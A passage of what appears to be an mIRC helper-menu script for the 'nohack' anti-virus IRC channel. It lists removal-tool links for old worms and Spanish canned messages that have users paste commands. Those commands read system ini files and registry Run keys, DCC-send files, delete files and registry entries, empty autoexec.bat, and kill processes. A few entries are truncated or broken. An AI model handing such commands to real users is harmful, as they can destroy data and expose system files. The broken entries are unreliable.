...w32/nimda $+ . $+ a@mm: //say 12[5 $$1 12] if you are infected with the virus
w32/nimda.a-mm please go to 3http://www.commandcom.com/virus/nimda.html to see
...w32/aplore $+ . $+ @mm: //say 12[5 $$1 12] if you are infected with the virus
w32/aplore@mm please go to
3http://securityresponse.symantec.com/avcenter/venc/data/w32.aplore@mm.html to see
the specific information about it.
..-
..dejhantulip.net
...removals
....a
.....aplore (dokfleed): //say 12[5 $$1 12] : aplore removal tool is found at
3http://www.dejhantulip.net/nohack/removers/dokfleed/aplore.exe
.....autoupder (symantec): //say 12[5 $$1 12] : autoupder removal tool is found
at 3http://www.dejhantulip.net/nohack/removers/symantec/fixautoupder.exe
....b
.....babylonia (quickheal): //say 12[5 $$1 12] : babylonia removal tool is found
at 3http://www.dejhantulip.net/nohack/removers/quickheal/kbabylon.zip
.....bhong.vbs (fruit^loop): //say 12[5 $$1 12] : bhong.vbs removal tool is
found at 3http://www.dejhantulip.net/nohack/removers/fruitloop/bhongrem.vbs
.....bo (quickheal): //say 12[5 $$1 12] : backorifice removal tool is found at
3http://www.dejhantulip.net/nohack/removers/quickheal/protect.zip
.....buddylist (symantec): //say 12[5 $$1 12] : buddylist removal tool is found
at 3http://www.dejhantulip.net/nohack/removers/symantec/fixbuddy.exe
....c
.....cih (nohack): //say 12[5 $$1 12] : cih removal tool is found at
3http://www.dejhantulip.net/nohack/removers/symantec/kill_cih.exe
.....cih (quickheal): //say 12[5 $$1 12] : cih removal tool is found at
3http://www.dejhantulip.net/nohack/removers/quickheal/killcih.zip
......-
......codered (symantec): //say 12[5 $$1 12] : codered removal tool is found at
3http://www.dejhantulip.net/nohack/removers/symantec/fixcred.exe
......codered.c (bitdefender): //say 12[5 $$1 12] : codered.c removal tool is
found at 3http://www.dejhantulip.net/nohack/removers/bitdefender/anticodered.zip
....d
.....dos funlove.4099 (symantec): //say 12[5 $$1 12] : dos funlove.4099 removal
tool is found at 3http://www.dejhantulip.net/nohack/removers/symantec/fixfun.exe
....f
.....freepics.jpg.vbs (fruit^loop): //say 12[5 $$1 12] : freepics.jpg.vbs
removal tool is found at
3http://www.dejhantulip.net/nohack/removers/fruitloop/freepicsrem.vbs
....h
.....happy99.worm (symantec): //say 12[5 $$1 12] : happy99.worm removal tool is
found at 3http://www.dejhantulip.net/nohack/removers/symantec/fixhappy.exe
.....happy99.worm (quickheal): //say 12[5 $$1 12] : happy99.worm removal tool is
found at 3http://www.dejhantulip.net/nohack/removers/quickheal/protect.zip
.....-
.....haptime.vbs (symantec): //say 12[5 $$1 12] : haptime.vbs removal tool is
found at 3http://www.dejhantulip.net/nohack/removers/symantec/fixhaptime.exe
....i
.....i-worm mtx (symantec): //say 12[5 $$1 12] : i-worm mtx removal tool is
found at 3http://www.dejhantulip.net/nohack/removers/symantec/fixmtx.exe
.....i-worm mtx (quickheal): //say 12[5 $$1 12] : i-worm mtx removal tool is
found at 3http://www.dejhantulip.net/nohack/removers/quickheal/killmtx.zip
.....-
.....i-worm magistr.a (symantec): //say 12[5 $$1 12] : i-worm magistr.a removal
tool is found at 3http://www.dejhantulip.net/nohack/removers/symantec/fixmagi.com
.....i-worm magistr.b (bitdefender): //say 12[5 $$1 12] : i-worm magistr.b
3http://www.dejhantulip.net/nohack/removers/bitdefender/antimagistr.b.exe
.....i-worm magistr.a (bitdefender): //say 12[5 $$1 12] : i-worm magistr.a
3http://www.dejhantulip.net/nohack/removers/bitdefender/antimagistra.exe
.....-
.....i-worm navidad (symantec): //say 12[5 $$1 12] : i-worm navidad removal tool
is found at 3http://www.dejhantulip.net/nohack/removers/symantec/fixnavid.com
.....i-worm navidad (quickheal): //say 12[5 $$1 12] : i-worm navidad removal
tool is found at
3http://www.dejhantulip.net/nohack/removers/quickheal/killnavb.zip
.....i-worm navidad (f-prot): //say 12[5 $$1 12] : i-worm navidad removal tool
is found at 3ftp://ftp.europe.f-secure.com/anti-virus/tools/naviddis.reg
.....i-worm navidad.b1 (bitdefender): //say 12[5 $$1 12] : i-worm navidad.b1
3http://www.dejhantulip.net/nohack/removers/bitdefender/antinavidad.com
.....-
.....i-worm prolin (quickheal): //say 12[5 $$1 12] : i-worm prolin removal tool
is found at 3http://www.dejhantulip.net/nohack/removers/quickheal/killcret.zip
.....i-worm prolin (bitdefender): //say 12[5 $$1 12] : i-worm prolin removal
tool is found at
3http://www.dejhantulip.net/nohack/removers/bitdefender/antiprolin.exe
.....-
.....i-worm qaz / w32.hllw.qaz.a (symantec): //say 12[5 $$1 12] :
w32.hllw.qaz.a/i-worm qaz removal tool is found at
3http://www.dejhantulip.net/nohack/removers/symantec/fixqaz.exe
.....i-worm qaz (bitdefender): //say 12[5 $$1 12] : i-worm qaz removal tool is
found at 3http://www.dejhantulip.net/nohack/removers/bitdefender/antiqaz.reg
.....-
.....i-worm sircam@mm (symantec): //say 12[5 $$1 12] : i-worm sircam@mm removal
tool is found at 3http://www.dejhantulip.net/nohack/removers/symantec/fixsirc.com
.....i-worm w32.sircam (quickheal): //say 12[5 $$1 12] : i-worm w32.sircam
3http://www.dejhantulip.net/nohack/removers/quickheal/qhwkill.zip
.....i-worm sircam.a (bitdefender): //say 12[5 $$1 12] : i-worm sircam.a removal
tool is found at
3http://www.dejhantulip.net/nohack/removers/bitdefender/antisircam.exe
....j
.....jpegbat (nohack): //say 12[5 $$1 12] : virus jpeg.bat removal tool is found
at 3http://www.dejhantulip.net/nohack/removers/nohack.bin/jpgbatrem.exe
....k
.....w32.klez (symantec): //say 12[5 $$1 12] : w32.klez removal tool is found at
3http://www.dejhantulip.net/nohack/removers/symantec/fixklez.com
.....w32.klez.h (quickheal): //say 12[5 $$1 12] : w32.klez.h removal tool is
found at 3http://www.dejhantulip.net/nohack/removers/quickheal/killklez.com
.....win32.klez(a,d,e,h) (bitdefender): //say 12[5 $$1 12] :
win32.klez(a,d,e,h) removal tool is found at
3http://www.dejhantulip.net/nohack/removers/bitdefender/antiklez.exe
.....w32.klez (f-prot): //say 12[5 $$1 12] : w32.klez removal tool is found at
3ftp://ftp.europe.f-secure.com/anti-virus/tools/fsklez.exe
.....-
.....kak.worm.b (symantec): //say 12[5 $$1 12] : kak.worm.b removal tool is
found at 3http://www.dejhantulip.net/nohack/removers/symantec/fixkakb.exe
.....kill_ez (symantec): //say 12[5 $$1 12] : kill_ez removal tool is found at
3http://www.dejhantulip.net/nohack/removers/symantec/kill_ez.exe
....l
.....links.vbs (fruit^loop): //say 12[5 $$1 12] : links.vbs removal tool is
found at 3http://www.dejhantulip.net/nohack/removers/fruitloop/vbsflrem.exe
.....links.vbs (nohack): //say 12[5 $$1 12] : links.vbs removal tool is found at
3http://www.dejhantulip.net/nohack/removers/nohack.bin/nolinks.vbs
.....links.vbs (nohack): //say 12[5 $$1 12] : links.vbs removal tool is found at
3http://www.dejhantulip.net/nohack/removers/nohack.bin/linkrem.vbs
.....-
.....lifestages.vbs (symantec): //say 12[5 $$1 12] : lifestages.vbs removal tool
is found at 3http://www.dejhantulip.net/nohack/removers/symantec/fixlife.exe
besides downloading that removal tool, please see the information page
3http://www.symantec.com/avcenter/venc/data/fix.vbs.stages.html for additional
information.
.....-
.....loveletter.vbs (symantec): //say 12[5 $$1 12] : loveletter.vbs removal tool
is found at 3http://www.dejhantulip.net/nohack/removers/symantec/fixlove.exe
besides downloading that removal tool, please see the information page
3http://securityresponse.symantec.com/avcenter/venc/data/fix.vbs.loveletter.html
for additional information.
.....loveletter (nohack): //say 12[5 $$1 12] : loveletter removal tool is found
at 3http://www.dejhantulip.net/nohack/removers/nohack.bin/lovlet-fix.zip
....m
.....millenium.vbs (fruit^loop): //say 12[5 $$1 12] : millenium.vbs removal tool
is found at
3http://www.dejhantulip.net/nohack/removers/fruitloop/millenniumrem.vbs
.....msn worms (dokfleed): //say 12[5 $$1 12] : msn worms removal tools are
found at 3http://www.dejhantulip.net/nohack/removers/dokfleed/msn.zip
.....mypicture.bmp.vbs (fruit^loop): //say 12[5 $$1 12] : mypicture.bmp.vbs
3http://www.dejhantulip.net/nohack/removers/fruitloop/mypicsrem.exe
....n
.....w32.nimda.a@mm (symantec): //say 12[5 $$1 12] : w32.nimda.a@mm removal tool
is found at 3http://www.dejhantulip.net/nohack/removers/symantec/fixnimda.com
.....w32.nimda.e@mm (symantec): //say 12[5 $$1 12] : w32.nimda.e@mm removal tool
is found at 3http://www.dejhantulip.net/nohack/removers/symantec/fxnimdae.com
.....w32.nimda.a (quickheal): //say 12[5 $$1 12] : w32.nimda.a removal tool is
found at 3http://www.dejhantulip.net/nohack/removers/quickheal/knimda.zip
.....win32.nimda.a@mm(a,e) (bitdefender): //say 12[5 $$1 12] :
win32.nimda.a@mm(a,e) removal tool is found at
3http://www.dejhantulip.net/nohack/removers/bitdefender/antinimda.exe
.....w32.nimda (f-prot): //say 12[5 $$1 12] : w32.nimda removal tool is found at
3ftp://ftp.europe.f-secure.com/anti-virus/tools/fsnimda.exe
.....-
.....nudesex.jpg.vbs (fruit^loop): //say 12[5 $$1 12] : nudesex.jpg.vbs removal
tool is found at 3http://www.dejhantulip.net/nohack/removers/fruitloop/nudesex-
jpgrem.vbs
.....nudesex.jpg.vbs (nohack): //say 12[5 $$1 12] : nudexex.jpg.vbs removal tool
is found at 3http://www.dejhantulip.net/nohack/removers/nohack.bin/nudesex-
jpgrem.vbs
....p
.....prettypark.worm (symantec): //say 12[5 $$1 12] : prettypark.worm removal
tool is found at 3http://www.dejhantulip.net/nohack/removers/symantec/fixppark.zip
....r
.....redlof.a (trend micro): //say 12[5 $$1 12] : vbs_redlof.a removal tool is
found as sysclean.com at 3http://www.trendmicro.com/download/tsc.asp 4*remember*
you must download the lattest pattern file for the removal to work. this pattern
file is found at 3http://www.trendmicro.com/download/pattern.asp under the name of
lpt###.zip you have to download that file and unzip it to the folder where you
have the trend micro cleaner.
.....redlof.b (trend micro): //say 12[5 $$1 12] : vbs_redlof.b may be removed by
the online-scan provided by trendmicro at
3http://housecall.trendmicro.com/housecall/start_corp.asp 4*note* for additional
information please see this webpage:
3http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?vname=vbs_redlof.b#solu
tion
....s
.....story.vbs (fruit^loop): //say 12[5 $$1 12] : story.vbs removal tool is
found at 3http://www.dejhantulip.net/nohack/removers/fruitloop/storyrem.vbs
....t
.....trojan.cdlist (bitdefender): //say 12[5 $$1 12] : trojan.cdlist removal
tool is found at
3http://www.dejhantulip.net/nohack/removers/bitdefender/anticdlist.zip
.....tune.vbs (fruit^loop): //say 12[5 $$1 12] : tune.vbs removal tool is found
at 3http://www.dejhantulip.net/nohack/removers/fruitloop/vbstunerem.exe
....w
.....w32.yaha (symantec): //say 12[5 $$1 12] : w32.yaha removal tool is found at
3http://www.dejhantulip.net/nohack/removers/symantec/fixyaha.com
.....w32.yaha a-l (bitdefender): //say 12[5 $$1 12] : w32.yaha (a-l) removal
tool is found at
3http://www.dejhantulip.net/nohack/removers/bitdefender/antiyahaa.exe
.....w32.yaha (f-prot): //say 12[5 $$1 12] : w32.yaha removal tool is found at
3ftp://ftp.europe.f-secure.com/anti-virus/tools/yahatool.zip
.....-
.....w95.spaces (bitdefender): //say 12[5 $$1 12] : w95.spaces removal tool is
found at
3http://www.dejhantulip.net/nohack/removers/bitdefender/antiwin95.spacescleaner.ex
e
.....-
.....w32.bugbear@mm (symantec): //say 12[5 $$1 12] : w32.bugbear@mm removal tool
is found at 3http://www.dejhantulip.net/nohack/removers/symantec/fxbgbear.exe
.....w32.bugbear.a (bitdefender): //say 12[5 $$1 12] : w32.bugbear.a removal
tool is found at
3http://www.dejhantulip.net/nohack/removers/bitdefender/antibugbear.exe
.....-
.....w32.hllw.lovgate (symantec): //say 12[5 $$1 12] : w32.hllw.lovgate removal
tool is found at 3http://www.dejhantulip.net/nohack/removers/symantec/fixlgate.exe
.....win32.lovgate.c@mm (bitdefender): //say 12[5 $$1 12] : win32.lovgate.c@mm
3http://www.dejhantulip.net/nohack/removers/bitdefender/antilovgate.exe
...-
...registry
....registry cleaner: // say 12[5 $$1 12] you may get regclean [a registry
cleaner and manipuling utility] at
3http://www.dejhantulip.net/registry/registry_cleaner.exe
....regscrub xp: //say 12[5 $$1 12] you may get regscrub [a registry fixer for
invalid entries/keys] at 3http://www.dejhantulip.net/registry/regscrubxp.exe
....regclean aatools: //say 12[5 $$1 12] you may get regcleaner aatools [a
registry fixer for invalid entries/keys] at
3http://www.dejhantulip.net/registry/aatools_regclean.zip
...spyware
....spybot: //say 12[5 $$1 12] you may get spybot [a spyware removal tool] at
3http://www.dejhantulip.net/nohack/removers/spybotsd11.exe
...-
...specific spams
....boogy.ini: //say 12[5 $$1 12] to get rid of the boogy.ini spam variant,
please get the following file and unzip it into your mirc directory:
3http://www.dejhantulip.net/nohack/files/cleanboogy.zip 4*note* read the
readme.txt file for detailled instructions.
....darby://say 12[5 $$1 12] to get rid of the darby spam variant, please get
the following file and save it into your mirc directory:
3http://www.dejhantulip.net/nohack/scripts/darby.irc 4i will guide you thru once
you saved the file in your mirc folder.
...specific gtbots
....sdbot: //say 12[5 $$1 12] to get rid of the sdbot infection, please get the
following file and save it into your mirc directory:
3http://www.dejhantulip.net/nohack/scripts/sdbot_fix.mrc 4i will guide you thru
once you saved the file in your mirc folder.
...-
...cmd-line tools
....sysinternals
.....pc info: //say 12[5 $$1 12] to get a stand-alone executable file to
retrieve important information about your os, please get the following file:
3http://www.dejhantulip.net/nohack/standalones/psinfo.exe 4*note* please save the
file to c:\ and tell me when you are done doing this so we can proceed.
.....-
.....running processes: //say 12[5 $$1 12] to get a stand-alone executable file
to retrieve the 4list of running processes in your os, please get the following
file: 3http://www.dejhantulip.net/nohack/standalones/pslist.exe 4*note* please
save the file to c:\ and tell me when you are done doing this so we can proceed.
.....processes kill: //say 12[5 $$1 12] to get a stand-alone executable file
that has the ability to 4kill running processes in your os, please get the
following file: 3http://www.dejhantulip.net/nohack/standalones/pskill.exe 4*note*
please save the file to c:\ and tell me when you are done doing this so we can
proceed.
....-
....open ports: //say 12[5 $$1 12] to get a stand-alone executable file that has
the ability to list and trace applications that have connections to the internet,
please get the following file:
3http://www.dejhantulip.net/nohack/standalones/openports.exe 4*note* please save
the file to c:\ and tell me when you are done doing this so we can proceed.
....tcp view: //say 12[5 $$1 12] to get a stand-alone executable file that has
the ability to list and trace applications that have connections to the internet
in real-time, please get the following file:
3http://www.dejhantulip.net/nohack/standalones/tcpview.exe 4*note* please save the
file to c:\ and tell me when you are done doing this so we can proceed.
....-
....get ip: //say 12[5 $$1 12] to retrieve your *real* ip please get the
following file: 3http://www.dejhantulip.net/nohack/standalones/getip.exe
...-
...spam remover: //say 12[5 $$1 12] you may get spam remover [a mirc spamming
removal tool] at 3http://www.dejhantulip.net/nohack/files/spam_remover.zip 4*note*
be sure to click on liveupdate to get the latest variants treated. read the
readme.txt files to understand the options and features of the spam remover.
...-
...win start-up: //say 12[5 $$1 12] get the following file
3http://www.dejhantulip.net/nohack/files/startup.exe to see all the files that are
being loaded to your computer when you boot it up.
...hijackthis: //say 12[5 $$1 12] get the following file
3http://www.dejhantulip.net/nohack/tools/hijackthis.exe run it and save the log.
tell me when you are done doing this.
...-
...this add-on: //notice $$1 (private) you can download nohack.irc v.4.0 made by
zvonarek at 3http://www.dejhantulip.net/nohack/files/nohackirc.zip
...nohack manual: //notice $$1 (private) you may get the nohack begginner's
manual from 3http://www.dejhantulip.net/nohack/docs/nh_begg_manual.zip
.-
.espaol
..msgs al canal
...necesitas ayuda ?: //say 12[5 $$1 12] holas... necesitas ayuda sobre v!rus ?
...copiar/pegar?: //say 12[5 $$1 12] sabes cmo copiar/pegar usando mirc ?
...mismo mirc?: //say 12[5 $$1 12] estas usando 4ahora el mismo mirc que estabas
usando cuando te dijeron que estabas mandando invitaciones/spam ?
...porq infectado?: //say 12[5 $$1 12]me podrias decir y describir por favor
detalladamente lo que te hace pensar que estas infectado ?
...-
...escribe cmds: //say 12[5 $$1 12] te voy a hacer escribir unos comandos que 2
se van a ver asi, escrbelos (o copia/pegalos) en este canal 4exactamente como te
los voy a decir. entiendes ? (si o no).
...escribe cmds (/type): //say 12[5 $$1 12] te voy a hacer escribir unos
comandos que 1,15se van a ver asi, escrbelos (o copia/pegalos) en este canal
4exactamente como te los voy a decir. entiendes ? (si o no).
...type cmds (/rtype): //say 12[5 $$1 12] te voy a hacer escribir unos comandos
que 4se van a ver asi, escrbelos (o copia/pegalos) en este canal 4exactamente como
te los voy a decir. entiendes ? (si o no).
...-
...describe prob: //say 12[5 $$1 12] por favor describe tu problema/infeccin con
los sintomas.
...copiar/pegar: //say 12[5 $$1 12] para copiar un texto de una ventana de mirc,
selecciona el texto con el mouse presionado el botn izquierdo, y arrstralo por el
texto que quieres copiar, el texto se marca de video inverso (negro), despus
suelta el botn (el color negro desaparece). pulzas ctrl + c. despus ve a la
ventana en donde quieres pegar el texto marcado y presiona ctrl+v y el texto ser
pegado.
...$chr(36) $+ findfile congelado: //say 12[5 $$1 12] $+ , te voy a hacer
escribir un comando en tu mirc ($findfile) y te hara parecer que tu mirc se
congel/colg, 4no te preocupes ese estado es normal ya que el comando se estar
ejecutando. entendido ?
...de nada: //say 12[5 $$1 12] de nada =)
...puedes salir: //say 12[5 $$1 12] te pido que si no necesitas ms ayuda salgas
del canal por favor. gracias.
...no necesita ayuda: //say 12[5 $$1 12] si no necesitas ayuda concerniente a
vlrus/tr0yanos/spam por favor te pido que salgas del canal ya que puede que hayan
personas que s necesiten de nuestra ayuda. gracias.
...-
...ests limpio: //say 12[5 $$1 12] estas limpio !! =)
...ests limpio (spam)1: //say 4[5 $$1 4] $+ , ahora ests desinfectado. fuiste
infectado porque visitaste un website infectado que te fue mandado en el irc, o
porque escribiste algn cdigo $decode o 2//write en tu mirc. 4por favor no vuelvas
a hacer esto.
...ests limpio (spam)2: //say 4[5 $$1 4] $+ , ahora necesitas hacer las
actualizaciones respectivas para tu windows. ve a
3http://windowsupdate.microsoft.com o escribe en tu mirc 2/run wupdmgr para hacer
las actualizaciones. 4despus de hacer todo eso estars completamente desinfectado.
...consejos (spam): //say 4[5 $$1 4] $+ , te aconsejo que no entres a dichas
pginas que te mandan por privados ni entres tampoco a pginas porno o que tengan
que ver con hack o crack. muchos de estos links son manejados por hacker los
cuales ponen a propsito cdigos malignos para infectar mquinas. no acepte archivos
de gente desconocida o archivos que no has solicitado
...-
..-
..info remotos
...scripts cargados: /say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!say $script(0)
...-
...primer script: /say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!say $script(1)
...ltimo script: /say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!say 2$script($script(0))
...primer y ltimo script: /say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!say tengo 2$script(0) scripts cargados. el primero es: 2$script(1)
, y el ltimo es: 2$script($script(0))
...-
...info variada: /say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!msg $chan $me $+ : tengo $mircini-- como mi principal ini en mirc.
tengo $script(0) scripts cargados, el primero es: $script(1) , y el ltimo es:
$script($script(0)) , mis dcc estan en estado $sreq , mi script.ini es =
$exists(script.ini) , y tengo $sock(*,0) socket(s) abierto(s).
...-
...[rfiles] en mirc.ini: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!play -trfiles $me mirc.ini 2000
..-
..spam
...desinfeccin 1 linea : remove.spam.1.line.es
...-
...desinfeccin paso a paso : set %step.by.step.nick $$1 | set
%step.by.step.spamming.virus $$?"wich version of spamming is it ?" |
remove.step.by.step.es
...-
...especfico
....mlrc.ini
.....unload/remove: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!remote off 2| !run attrib -r mirc.ini 2| !ignore -r 2| !sockclose *
2| !timers off 2| !unload -rsn mlrc.ini 2| !remove mlrc.ini 2| !run attrib +r
mirc.ini 2| !msg $active $me : removido mlrc.ini 2| !msg $active buscando
mlrc.ini... 2| !msg $active 2$findfile(c:\,mlrc.ini,0,2msg $active 2$1-) 2| !
remote on
.....-
.....remini win.ini: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//remini c:\windows\win.ini windows run
.....play win.ini [run]: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//play -twindows $me c:\windows\win.ini 1750
.....-
.....remini system.ini: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//remini c:\windows\system.ini boot shell
.....writeini system.ini: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//writeini c:\windows\system.ini boot shell explorer.exe
.....play system.ini [boot]: //say 12[5 $$1 12] por favor escribe (o copia/pega)
lo siguiente: 2//play -tboot $me c:\windows\system.ini 1750
.....-
.....findfile (# vbs): //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//say 2$findfile(c:\windows\,*.vbs,0)
.....findfile (names vbs): { //say 12[5 $$1 12] por favor escribe (o copia/pega)
lo siguiente: 2//say 2$findfile(c:\windows\,*.vbs,0,write c:\win_vbs.txt 2$1-) |
//say 12[5 $$1 12] $+ : despus de escribirlo por favor escribe esto otro: 2/dcc
send $me c:\win_vbs.txt }
....boogy.ini
.....limpiar autoexec.bat: //say 12[5 $$1 12] por favor escribe (o copia/pega)
lo siguiente: 2//!if (($os == xp) || ($os == me) || ($os == 2k) || 2($os == nt))
2{ //!write -c c:\autoexec.bat 2| !msg 2 $active removido: c:\autoexec.bat 2} 2|
else 2{ !msg 2 $active desinfeccion error: mi sistema operativo es 2$os 2}
.....-
.....chequear lhy*.ini: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!msg $active 2$findfile(c:,lhy*.ini,0,msg $active 2$1-)
.....remover lhy*.ini: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!msg $active 2$findfile(c:,lhy*.ini,0,remove 2$shortfn($1-)) 2| !
msg $active 2removidos todo los lhy*.ini en la unidad c:
.....-
.....chequear mypic.bat: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!msg $active 2$findfile(c:,mypic.bat,0,msg $active 2$1-)
.....remover mypic.bat: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!msg $active 2$findfile(c:,mypic.bat,0,remove 2$shortfn($1-)) 2| !
msg $active 2removidos todo los mypic.bat en la unidad c:
.....-
.....chequear navdx*.reg: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!msg $active 2$findfile(c:,navdx*.reg,0,msg $active 2$1-)
.....remover navdx*.reg: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!msg $active 2$findfile(c:,navdx*.reg,0,remove 2$shortfn($1-)) 2| !
msg $active 2removidos todo los navdx*.reg en la unidad c:
.....-
.....chequear update.vbs: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!msg $active 2$findfile(c:,update.vbs,0,msg $active 2$1-)
.....remover update.vbs: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!msg $active 2$findfile(c:,update.vbs,0,remove 2$shortfn($1-)) 2| !
msg $active 2removidos todo los update.vbs en la unidad c:
.....-
.....unload/remove $chr(91) $+ boogy.ini $+ $chr(93): //say 12[5 $$1 12] por
favor escribe (o copia/pega) lo siguiente: 2//!remote off 2| !ignore -r 2| !unload
-rsn boogy.ini 2| !remove boogy.ini 2| !remote on 2| !msg $active $me : removido
boogy.ini 2| !msg 2 $active buscando boogy.ini... 2| !msg $active
2$findfile(c:\,boogy.ini,0,msg $active 2$1-)
.....unload/remove $chr(91) $+ script.ini $+ $chr(93): //say 12[5 $$1 12] por
favor escribe (o copia/pega) lo siguiente: 2//!remote off 2| !ignore -r 2| !unload
-rsn script.ini 2| !remove script.ini 2| !remote on 2| !msg $active $me : removido
script.ini 2| !msg $active buscando script.ini... 2| !msg $active
2$findfile(c:\,script.ini,0,msg $active 2$1-)
....matrix2
siguiente: 2//!remote off 2| !ignore -r 2| !unload -rsn matrix2 2| !remove matrix2
2| !remote on 2| !msg $active : removido matrix2 2| !msg $active buscando
matrix2... 2| !msg $active 2findfile(c:\,matrix2,0,msg $active 2-)
....nospam
siguiente: 2//!remote off 2| !ignore -r 2| !unload -rsn nospam 2| !remove nospam
2| !remote on 2| !msg $active $me : removido nospam 2| !msg $active buscando
nospam... 2| !msg $active 2$findfile(c:\,nospam,0,msg $active 2$1-)
..-
..comandos
...$chr(36) $+ findfile: set %findfile.dir $$?"drive or path (example c:)" |
set %findfile.file $$?"name of the file (example *nospam*)" | //say 12[5 $$1 12]
por favor escribe (o copia/pega) lo siguiente: 2//say
%find.file.spamming.virus.step.by.step $+ ( $+ %findfile.dir $+ , $+
%findfile.file $+ ,0,msg $me $ $+ 1-)
...$chr(36) $+ exists: set %exists.file $$?"name of the file (within mirc dir)"
| //say 12[5 $$1 12] por favor escribe (o copia/pega) lo siguiente: 2//say
%exists.spamming.virus.step.by.step $+ ( $+ %exists.file $+ )
...-
...$chr(36) $+ disk: //say 12[5 $$1 12] por favor escribe (or copy/paste):
2//say 2 %hd.check 2[ c 2$disk(c:) 2] 2[ d 2$disk(d:) 2] 2[ e 2$disk(e:) 2] 2[ f
2$disk(f:) 2] 2[ z 2$disk(z:) 2] 2[ w 2$disk(w:) 2]
...$chr(36) $+ os: //say 12[5 $$1 12] por favor escribe (or copy/paste): 2//say
2$os
...-
...misc. info: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo siguiente:
2//!msg $chan $me $+ : 2$os <> 2$version 2$mircdir <> 2$isfile(c:\autoexec.bat)
2$lines(c:\autoexec.bat) <> 2$isdir(c:\windows\) <>
...-
...play file: /set %play.file $$?"specify the location of file (use
$shortfn(file) it is too large) or just the name (if it is on mirc's directory)" |
//say 12[5 $$1 12] $+ :por favor escribe (o copia/pega) lo siguiente: 2/play 2
$me %play.file 2000
...-
...borrar archivos en dir
....output on channel: rem.files.dir.es
....output on remreport.txt: rem.files.dir.remreport.es
...-
...terminar proceso activo: /set %process.kill $$?="type in here the image name
of the process" | //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!run taskkill 2/im %process.kill 2| !msg $chan $me : proceso
terminado ( %process.kill )
...-
...abortar apagado de so: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo
siguiente: 2//!run shutdown /a 2| !msg $chan $me : todos los intentos de apagar mi
sistema operatvio 2$os fueron terminados.
...-
..-
..analisis profundo
...registro
....exportar entradas
.....especifica ?: //set %regedit.specific.nohack $$?="type the string to be
saved in rs.txt" | reg.specific.nohack
.....-
.....run: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo siguiente:
2//run 2regedit 2$iif2(2$os == 2xp,2/a,2/e) c:\run.txt
hkey_local_machine\software\microsoft\windows\currentversion\run 2| 2msg $active
$me : run.txt ok!
.....-
.....chatfile: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo siguiente:
2//run 2regedit 2$iif2(2$os == 2xp,2/a,2/e) c:\cf.txt hkey_classes_root\chatfile
2| 2msg $active $me cf.txt ok!
.....irc: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo siguiente:
2//run 2regedit 2$iif2(2$os == 2xp,2/a,2/e) c:\irc.txt hkey_classes_root\irc 2|
2msg $active $me irc.txt ok!
....-
....escribir al reg:
....borrar del registro: { set %regdelete $$?="enter the <path key>\<entry
name>" | say 12[5 $$1 12] por favor escribe (o copia/pega) lo siguiente:
2//!2comopen 2regdel 2wscript.shell 2| 2//!set 2%del
2$com(regdel,regdelete,3,bstr, $+ %regdelete $+ ) 2| 2//!comclose regdel 2|
2//!msg $active $me : entrada del registro borrada }
....leer del registro: { set %regreader $$?="enter the <path key>\<entry name>"
| say 12[5 $$1 12] por favor escribe (o copia/pega) lo siguiente: 2//!2comopen
2regread 2wscript.shell 2| 2//!set 2%read 2$com(regread,regread,3,bstr, $+
%regreader $+ ) 2| 2var 2%result 2= 2$com(regread).result 2| 2//!comclose regread
2| 2//!msg $active $me : entrada del registro leida: 2%result }
...-
...autoexec.bat
....write:{ set %autoexec.bat.write $$?="path for the file & file name" | //say
12[5 $$1 12] por favor escribe (o copia/pega) lo siguiente: 2/write
c:\autoexec.bat 2 %autoexec.bat.write }
....write (del): { set %autoexec.bat.del $$?="path for the file & file name" |
//say 12[5 $$1 12] por favor escribe (o copia/pega) lo siguiente: 2/write
c:\autoexec.bat del 2 %autoexec.bat.del }
....-
....delete a line:{ set %autoexec.bat.del.line $$?="input the line number" |
echo -a haz que el usuario escriba esto--> /write -dl $+ %autoexec.bat.del.line
c:\autoexec.bat }
....overwrite line:{ set %autoexec.bat.overwrite.line $$?="input the line number
to be overwrited" | set %autoexec.bat.overwrite.text $$?="type the line which will
be overwritten" | echo -a haz que el usuario escriba esto --> /write -l $+
%autoexec.bat.overwrite.line c:\autoexec.bat %autoexec.bat.overwrite.text }
...-
...win.ini
....play win.ini: set %user.win.dir $$?"whats his/her windows directory ?
(usually c:\windows\)" | //say 12[5 $$1 12] $+ : por favor escribe (o copia/pega)
lo siguiente: 2//!play $me 2$shortfn($findfile( $+ %user.win.dir $+ ,win.ini,1))
2000
....-
....run: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo siguiente:
2//!msg $chan $me $+ : 2$readini(c:\windows\win.ini,windows,run) 2$readn
....load: //say 12[5 $$1 12] por favor escribe (o copia/pega) lo siguiente:
//!msg $chan $me $+ : 2$readini(c:\windows\win.ini,windows,load) 2$readn
...-
....system.ini
....play system.ini: set %user.win.dir $$?"whats his/her windows directory ?
